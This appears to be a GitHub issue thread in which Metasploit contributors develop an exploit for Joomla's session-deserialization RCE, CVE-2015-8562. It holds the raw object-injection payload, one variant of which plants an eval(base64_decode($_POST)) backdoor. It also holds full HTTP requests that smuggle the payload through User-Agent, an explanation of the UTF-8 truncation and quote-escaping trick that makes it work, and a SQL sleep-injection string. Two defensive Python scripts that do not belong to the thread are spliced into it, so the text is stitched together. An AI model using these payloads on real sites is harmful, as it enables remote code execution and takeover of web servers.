[Request] Critical 0day RCE in Joomla (CVE-2015-8562) #6347

Closed
madmike33 opened this Issue Dec 14, 2015 · 104 comments

@madmike33

@jvoisin are you interested, mate?

This is a serious vulnerability that can be easily exploited and is already in the wild. http://hubs.ly/H01B2K20

Contributor

wvu-r7 commented Dec 14, 2015

Thank you, @madmike33. Looks much better, lol.

madmike33 Dec 14, 2015

Agree 😁


@madmike33 madmike33 closed this Dec 14, 2015

@madmike33 madmike33 reopened this Dec 14, 2015

madmike33 Dec 14, 2015

@wvu-r7 how about some labels


Contributor

FireFart commented Dec 14, 2015

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6


madmike33 Dec 14, 2015

@FireFart tu, interesting; it's all about uploading the payload in the tokens, if I'm not wrong



Contributor

FireFart commented Dec 14, 2015

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry


Contributor

brandonprry commented Dec 14, 2015

I am very close, give me an hour or so.

madmike33 Dec 14, 2015

@brandonprry waiting to be the first one to test it :)



Contributor

FireFart commented Dec 14, 2015

@brandonprry great! I need to get some sleep, will check it tomorrow morning in about 6 hours


Contributor

brandonprry commented Dec 15, 2015

It takes two requests:

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. The intent is obvious, but something seems to be missing...


Contributor

brandonprry commented Dec 15, 2015

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

@kendyhikaru

This comment has been minimized.

Show comment
Hide comment

@brandonprry waiting for your info.


Contributor

brandonprry commented Dec 15, 2015

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.


Contributor

brandonprry commented Dec 15, 2015

They are not related.

EDIT: I might have spoken too soon.


Contributor

FireFart commented Dec 15, 2015

@brandonprry that's exactly how far I got :(


Contributor

wvu-r7 commented Dec 15, 2015

I poked at this on my own... and got equally as far, lol.


Contributor

wvu-r7 commented Dec 15, 2015

Think I got it.


Contributor

FireFart commented Dec 15, 2015

So it seems the exploit works like some session injection. It puts in a new session identifier __test (instead of the normal __default) with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479


Contributor

wvu-r7 commented Dec 15, 2015

Gonna put together a PoC... hope it's not a fluke!


Contributor

FireFart commented Dec 15, 2015

@wvu-r7 👯 so send it over for testing :D


Contributor

wvu-r7 commented Dec 15, 2015

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

madmike33 Dec 15, 2015

So, anything new so far, guys? The thing is in the payload; according to Sucuri they modified the payload. @wchen-r7 any idea from your side too?



Contributor

wvu-r7 commented Dec 15, 2015

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

icehteam Dec 15, 2015

The code gets inserted into the sessions table in the database; I'm sure there must be a pattern to call the serialized data to inject with POST data of 111.



Contributor

FireFart commented Dec 15, 2015

Yeah, but we haven't found it so far.


evi1m0 commented Dec 15, 2015

We need to find it. :<

madmike33 Dec 15, 2015

Something weird: I set my User-Agent as
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
The first time it worked; after that, when I retried, I just got a 500 error. I wonder if it has something to do with overwriting sessions :/ @brandonprry @FireFart @wvu-r7 BTW I modified it a little, have a look at it



madmike33 Dec 15, 2015

@icehteam give it a try on your side with the payload I mentioned above using base64 and let me know your result



Contributor

mmetince commented Dec 15, 2015

@brandonprry Your User-Agent has to start or end with a double quote in order to do string escaping in the serialized string. Also, your payload has to end with some special character that latin-1 does NOT support, like ð.

For example:
User-Agent: TEST

Serialized string is:

 __default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169533;s:18:"session.timer.last";i:1450169533;s:17:"session.timer.now";i:1450169533;s:22:"session.client.browser";s:4:"TEST";s:8:"registry";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:4:"user";O:5:"JUser":26:{s:9:"\0\0\0isRoot";b:0;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:1:"9";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:12:"requireReset";N;s:10:"\0\0\0_params";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:14:"\0\0\0_authGroups";a:2:{i:0;i:1;i:1;i:9;}s:14:"\0\0\0_authLevels";a:3:{i:0;i:1;i:1;i:1;i:2;i:5;}s:15:"\0\0\0_authActions";N;s:12:"\0\0\0_errorMsg";N;s:13:"\0\0\0userHelper";O:18:"JUserWrapperHelper":0:{}s:10:"\0\0\0_errors";a:0:{}s:3:"aid";i:0;}s:16:"com_mailto.links";a:4:{s:40:"864263691cf020260fd769f9e91b5152c4a0e278";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/3-welcome-to-your-blog";s:6:"expiry";i:1450169533;}s:40:"a7425dbaaa274c9c71da73ebdfc40ed0e1941365";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/4-about-your-home-page";s:6:"expiry";i:1450169533;}s:40:"50717150dd908262db5e49b4334dcc7f2d3bd0dd";O:8:"stdClass":2:{s:4:"link";s:47:"http://127.0.0.1:8181/index.php/6-your-template";s:6:"expiry";i:1450169533;}s:40:"78e8cf066aacebaecd359c665129e4281e269205";O:8:"stdClass":2:{s:4:"link";s:46:"http://127.0.0.1:8181/index.php/5-your-modules";s:6:"expiry";i:1450169533;}}}

Please look at where TEST is located.

User-Agent is: TESTð (ending with a character that is not valid for latin-1)
Serialized string is:

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169650;s:18:"session.timer.last";i:1450169650;s:17:"session.timer.now";i:1450169650;s:22:"session.client.browser";s:5:"TEST

As you can see, the rest of the serialized string is omitted because of MySQL behavior (it reminds one of the WordPress stored XSS). That is our entry point. Also, as I said before, our payload needs to end/start with a double quote in order to do another trick, which is escaping!

User-Agent is: TEST"}ð

Serialized string is :

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169799;s:18:"session.timer.last";i:1450169799;s:17:"session.timer.now";i:1450169799;s:22:"session.client.browser";s:6:"TEST"}

We managed to define the __default array with valid syntax. Then we are free to define our serialized object that carries the payload through the MySQLDriver class.
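A defender-side check for the truncation and escaping behaviour mmetince describes, added here as an example; it is not code from this thread, from Joomla or from Metasploit. It parses constructed Apache combined-format access-log lines and flags User-Agent values that carry PHP serialized-object syntax, the gadget class names from the payload above, the }__test| session-key prefix, or a 4-byte UTF-8 character (the raw payload ends in one; MySQL's 3-byte utf8 charset cuts the stored session string off at it). The log lines, client IPs and the abridged payload are constructed samples.

```python
"""Defender-side check for the session-poisoning pattern discussed in this issue.

Scans Apache combined-format access-log lines, undoes the escaping Apache
applies to header values (backslash-quote for quotes, backslash-xHH for
non-printable bytes) and flags User-Agent values that look like a
CVE-2015-8562 attempt. All log lines below are constructed samples.
"""
import re

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)

# PHP serialized object header: O:<len>:"<ClassName>":<n>:{
PHP_OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)":\d+:\{')
# Serialized session-key separator injected before the object ("}__test|")
SESSION_KEY_RE = re.compile(r'\}__[A-Za-z0-9_]+\|')
# Gadget classes named in the payload posted in this thread
GADGET_CLASSES = {
    "JDatabaseDriverMysqli", "JDatabaseDriverMysql", "JSimplepieFactory", "SimplePie",
}


def unescape_log_field(field):
    """Undo Apache-style escaping (backslash-xHH, backslash-quote, double backslash)."""
    out = bytearray()
    i = 0
    while i < len(field):
        ch = field[i]
        if ch == "\\" and i + 1 < len(field):
            nxt = field[i + 1]
            if nxt == "x" and i + 3 < len(field):
                try:
                    out.append(int(field[i + 2:i + 4], 16))
                    i += 4
                    continue
                except ValueError:
                    pass  # not a \xHH escape; keep the backslash literally
            if nxt in '"\\':
                out.append(ord(nxt))
                i += 2
                continue
        out += ch.encode("utf-8")
        i += 1
    return bytes(out)


def analyze_user_agent(raw):
    """Return the list of indicators found in a raw (unescaped) User-Agent value."""
    text = raw.decode("utf-8", errors="replace")
    reasons = []
    classes = PHP_OBJECT_RE.findall(text)
    if classes:
        reasons.append("php-serialized-object")
        hits = sorted(set(classes) & GADGET_CLASSES)
        if hits:
            reasons.append("joomla-gadget:" + ",".join(hits))
    if SESSION_KEY_RE.search(text):
        reasons.append("session-key-injection")
    # Characters above U+FFFF need 4 bytes in UTF-8; MySQL's 3-byte utf8
    # charset cuts the stored session string off at the first one.
    if any(ord(c) > 0xFFFF for c in text):
        reasons.append("4byte-utf8-truncation-trigger")
    return reasons


def scan_log(lines):
    """Return (client_ip, request_line, indicators) for every suspicious log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        reasons = analyze_user_agent(unescape_log_field(m.group("ua")))
        if reasons:
            findings.append((m.group("ip"), m.group("req"), reasons))
    return findings


# Constructed sample log lines (IPs are documentation ranges, not real clients).
SAMPLE_LOG = [
    # Ordinary browser request.
    '203.0.113.5 - - [15/Dec/2015:10:01:02 +0000] "GET / HTTP/1.1" 200 4312 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0"',
    # Abridged form of the User-Agent payload from the thread, escaped the way
    # Apache logs it: quotes as \", NUL bytes and the trailing 4-byte character as \xHH.
    '198.51.100.7 - - [15/Dec/2015:10:01:09 +0000] "GET / HTTP/1.1" 500 0 "-" '
    '"}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:2:\\"fc\\";O:17:\\"JSimplepieFactory\\":0:{}'
    's:21:\\"\\x00\\x00\\x00disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{'
    's:8:\\"feed_url\\";s:36:\\"sleep(5);JFactory::getConfig();exit;\\";}i:1;s:4:\\"init\\";}}'
    's:13:\\"\\x00\\x00\\x00connection\\";b:1;}\\xf0\\x9d\\x8c\\x86"',
    # Only the truncation trigger, no object syntax: the TESTð-style probe.
    '198.51.100.9 - - [15/Dec/2015:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 4312 "-" '
    '"TEST\\xf0\\x9d\\x8c\\x86"',
]

if __name__ == "__main__":
    for ip, req, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {req!r}: {', '.join(reasons)}")
```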

madmike33 Dec 15, 2015

@mmetince Nice, friend :) I think he has a point :)


icehteam Dec 15, 2015

@evi1m0 congrats that you have found it.



shargon commented Dec 15, 2015

This code produces an insert in the session table... but the code doesn't execute...

GET http://xxxxxxxxxxxx/index.php?lang=es HTTP/1.1
Host: xxxxxx
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}
Accept-Language: es-ES,es;q=0.8
Cookie: _ga=GA1.2.643008714.1450174140; 4129bbefb84766bd976b50022b1d5584=dsviufiujk25e1eoug2fuktln6; 5a63016b8228e8842a075e3be3ccdab8=es-ES

In the table I got this... (field data)

'__default|a:7:{s:15:"session.counter";i:2;s:19:"session.timer.start";i:1450185484;s:18:"session.timer.last";i:1450185484;s:17:"session.timer.now";i:1450185497;s:22:"session.client.browser";s:396:"}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}";s:8:"registry";O:9:"JRegistry":1:{s:7:"

I'm still working...

madmike33 Dec 15, 2015

@shargon tu for the clarification, I wanted to see if it's only me getting until here ;) I know where to look now :)


allyshka Dec 15, 2015

@shargon The problem is the size of the serialized data. In your example: s:396:"}__test|O:21:"JDatabaseDriverMysqli

If you use a payload like this: ";}__ the wrong size of the string variable causes an error during the unserialize process.
If the size is correct, then the exploit is successful.

The question is: how to get the correct size.



shargon commented Dec 15, 2015

@allyshka I can insert inside the first __default like this...

UserAgent: TEST" CODE HERE }ð

and the result in the session table (data field) is:

'__default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450187208;s:18:"session.timer.last";i:1450187208;s:17:"session.timer.now";i:1450187208;s:22:"session.client.browser";s:19:"TEST" CODE HERE }ð";s:8:"registry";O:9:"JRegistry":1:{s:7:"

but yes, the size is 19...


shargon commented Dec 15, 2015

I think the exploit is like this... dummy";s:xxx:"EXPLOIT" }\0ð


cyadron commented Dec 15, 2015

Getting data in the DB is solved. But we must find a magic method to also get the data out (execute the object).

madmike33 Dec 15, 2015

@cyadron something like this? AND (SELECT * FROM (SELECT(SLEEP(5)))TEST) AND (3432=3432



shargon commented Dec 15, 2015

@madmike33 ... this is SQL... it has nothing to do with the subject

madmike33 Dec 15, 2015

@shargon I know that it is SQL, however how are you planning on calling it except with an SQL query? BTW this is just an example



shargon commented Dec 15, 2015

@madmike33

This exploit runs like this:

First, insert the payload in the session table (in the correct way).

Then, on the next call to the server, the session is deserialized and the PHP payload executes.

Sorry for my bad English.

icehteam Dec 15, 2015

Anybody with good knowledge of OOP can execute this; I'm still trying... anyone using Skype??
add me: base64_decode('bXIuY2h1cmNobDMzdA=='); lol


madmike33 Dec 15, 2015

Yeah, it's a good idea, we can make a group and everyone gives his idea on Skype @icehteam


cyadron Dec 15, 2015

@shargon Do you mean that the next time you reload that page, session info is read from the database and deserialized and the object is executed?

shargon Dec 15, 2015

@cyadron yes, I thought it is like this. To run the exploit it's necessary to make 2 calls: one to poison, two to execute.

The execution part is simple: Joomla deserializes the session and runs the poison...

The hard work is making the correct payload to exploit it

madmike33 Dec 15, 2015

Yes, what @cyadron said is true, we need two calls, as @brandonprry perry stated earlier

FireFart (Contributor) Dec 15, 2015

Guys, please use IRC or Skype for discussing this exploit; this issue is getting too big and too off-topic

icehteam Dec 15, 2015

My Skype is base64_decode('bXIuY2h1cmNobDMzdA=='); let me know yours, folks.

cyadron Dec 15, 2015

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

borismattijssen Dec 15, 2015

edit:
decided to remove the screenshot as I just posted it out of excitement, not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

jstnkndy (Contributor) Dec 15, 2015

@borismattijssen What's the purpose of posting a screenshot but no technical details?

borismattijssen Dec 15, 2015

@jstnkndy I feel like the vulnerability is too young to share the technical details on the internet.

FireFart (Contributor) Dec 15, 2015

lol

jstnkndy (Contributor) Dec 15, 2015

so the screenshot is just.... bragging?

borismattijssen Dec 15, 2015

just showing it isn't that hard.

falconz Dec 15, 2015

@borismattijssen I see the vulnerability is in User-Agent or X-Forwarded-For; why did you hide the URI?

deftskiddie Dec 15, 2015

@falconz my guess: it is not a private address lol

FireFart (Contributor) Dec 15, 2015

Closing this because the details are publicly available and a module is also ready

FireFart closed this Dec 15, 2015

wchen-r7 (Contributor) Dec 15, 2015

@FireFart In your commit, I recommend just doing Resolve #6347. That way when your PR lands, this issue automatically tags and closes it. And if you want to end the conversation early, I guess we can try to lock it (it is a button for me).

wvu-r7 (Contributor) Dec 17, 2015

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

wchen-r7 changed the title from [Request] Critical 0day RCE in joomla to [Request] Critical 0day RCE in Joomla (CVE-2015-8562) Dec 17, 2015

GHOST07v Dec 18, 2015

Does not work for me...

ggg4566 Dec 19, 2015

Does not work on versions below 3.x, need to find another trick

bgeesaman Dec 20, 2015

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

JohnMartinelli Dec 20, 2015

If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY
FOR CODING THE FIXES as I have never contributed to an open source
project (a big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for
you? I can get those to work, but not the php meterpreter variants on
the three systems I built to test this on.

icehteam Dec 20, 2015

@ggg4566 X-Forwarded-For works in 3.x; you need to use User-Agent for some versions. @JohnMartinelli you're late to the party fff...

am06 Dec 21, 2015

I've read that a session_decode() bug is needed for this to work...? Can anyone please tell me what that bug is about?
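Added example, not code from this thread, from Joomla, from PHP or from the Metasploit module: a Python model of the "php" session-serializer decode loop that shargon and cyadron describe above (poison the stored session, get the object back on the next deserialization) and that am06's session_decode() question is about. It parses a small subset of PHP's serialize() format and walks the `name|value` pairs of a session record the way the old session.c loop did; the simplification is an assumption, in particular that a value which fails to unserialize does not abort decoding and the scan just continues at the next `|`. On constructed records it shows that a user agent carrying an embedded `evil|O:...` pair is harmless while its enclosing string's length prefix is honoured, but that a record which comes back cut short lets that pair be decoded as a new session variable holding an object. How a stored record ends up truncated in a real deployment is outside what this thread covers. `safe_session_decode` is the check a practitioner would want on the read path: discard a damaged record and refuse objects. The `__default` key and the `Evil` class are made up for the sample.

```python
"""Simplified model of PHP's 'php' session-serializer decode loop (assumption).

Added example; not code from Joomla, PHP or Metasploit. A record looks like
name|<serialized>name|<serialized>...  and the old loop kept scanning for the
next '|' after a value failed to unserialize instead of aborting.
"""
from dataclasses import dataclass, field
from typing import Any, Dict, List, Tuple


@dataclass
class PHPObject:
    """Stand-in for the object PHP would instantiate: class name plus properties."""
    cls: str
    props: Dict[str, Any] = field(default_factory=dict)


class UnserializeError(Exception):
    """Malformed or truncated serialize() data."""


def _read_until(data: str, pos: int, ch: str) -> Tuple[str, int]:
    end = data.index(ch, pos)                 # ValueError if the delimiter is missing
    return data[pos:end], end + 1


def unserialize(data: str, pos: int = 0) -> Tuple[Any, int]:
    """Parse one serialize()'d value (subset: N i b s a O); return (value, next pos).

    A string whose declared length does not fit the remaining bytes is a failure,
    which is what a truncated record produces.
    """
    tag = data[pos]
    if tag == "N":                                                # N;
        return None, pos + 2
    if tag in "ib":                                               # i:42;  b:1;
        raw, pos = _read_until(data, pos + 2, ";")
        return (int(raw) if tag == "i" else raw == "1"), pos
    if tag == "s":                                                # s:5:"hello";
        raw, pos = _read_until(data, pos + 2, ":")
        n = int(raw)
        if data[pos] != '"' or pos + n + 3 > len(data):
            raise UnserializeError(f"string of {n} bytes at {pos} is truncated")
        if data[pos + n + 1:pos + n + 3] != '";':
            raise UnserializeError(f"bad string terminator at {pos + n + 1}")
        return data[pos + 1:pos + n + 1], pos + n + 3
    if tag in "aO":                                               # a:1:{k;v;}  O:4:"Evil":1:{k;v;}
        raw, pos = _read_until(data, pos + 2, ":")
        if tag == "O":
            cls = data[pos + 1:pos + 1 + int(raw)]
            raw, pos = _read_until(data, pos + int(raw) + 3, ":")  # skip '"Cls":'
            out: Any = PHPObject(cls)
            store = out.props
        else:
            out = store = {}
        pos += 1                                                   # skip '{'
        for _ in range(int(raw)):
            key, pos = unserialize(data, pos)
            store[key], pos = unserialize(data, pos)
        return out, pos + 1                                        # skip '}'
    raise UnserializeError(f"unknown tag {tag!r} at {pos}")


def session_decode(record: str) -> Tuple[Dict[str, Any], List[str]]:
    """Decode a record the way the old loop did: name up to '|', then one value.

    On a failed value the scan resumes right after that '|' (simplified from
    session.c, which resumed where the parser stopped), so a '|' inside the
    damaged value is taken as the next variable delimiter.
    """
    variables: Dict[str, Any] = {}
    failures: List[str] = []
    pos = 0
    while (bar := record.find("|", pos)) >= 0:
        name = record[pos:bar]
        try:
            variables[name], pos = unserialize(record, bar + 1)
        except (UnserializeError, ValueError, IndexError) as exc:
            failures.append(f"{name!r}: {exc}")
            pos = bar + 1
    return variables, failures


def contains_object(value: Any) -> bool:
    """True if anything decoded is an object, i.e. something unserialize would instantiate."""
    if isinstance(value, PHPObject):
        return True
    return isinstance(value, dict) and any(contains_object(v) for v in value.values())


def safe_session_decode(record: str) -> Dict[str, Any]:
    """Hardened read path: a damaged record is discarded and objects are refused
    (the same intent as unserialize($s, ['allowed_classes' => false]) in PHP 7)."""
    variables, failures = session_decode(record)
    if failures:
        raise UnserializeError("corrupt session record: " + "; ".join(failures))
    if contains_object(variables):
        raise UnserializeError("object found in session data; refusing to instantiate")
    return variables


# Constructed samples. UA carries an extra  evil|O:...  pair; while the length prefix of
# the enclosing string is intact it is only text. TRUNCATED has lost the closing '";'.
UA = 'Mozilla/5.0 x|evil|O:4:"Evil":1:{s:3:"cmd";s:2:"id";}'
BENIGN = 'session.token|s:8:"deadbeef";__default|a:1:{s:2:"ua";s:11:"Mozilla/5.0";}'
INTACT = f'session.token|s:8:"deadbeef";ua|s:{len(UA)}:"{UA}";'
TRUNCATED = INTACT[:-2]

if __name__ == "__main__":
    for label, rec in (("benign", BENIGN), ("intact", INTACT), ("truncated", TRUNCATED)):
        variables, failures = session_decode(rec)
        print(label, "->", variables, "failures:", failures)
```

Running it prints the benign and intact records decoding to plain strings with no failures, while the truncated record yields two parse failures followed by a variable `evil` holding `PHPObject(cls='Evil', props={'cmd': 'id'})`; `safe_session_decode` rejects that record before anything would be instantiated.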

VivekShingala Oct 6, 2017

Is this error harmful for other frameworks like CodeIgniter or core PHP websites? I have found these logs in such frameworks. I do not use Joomla for most of the sites; however, I still find these logs.

If yes, what steps should be taken to prevent it?
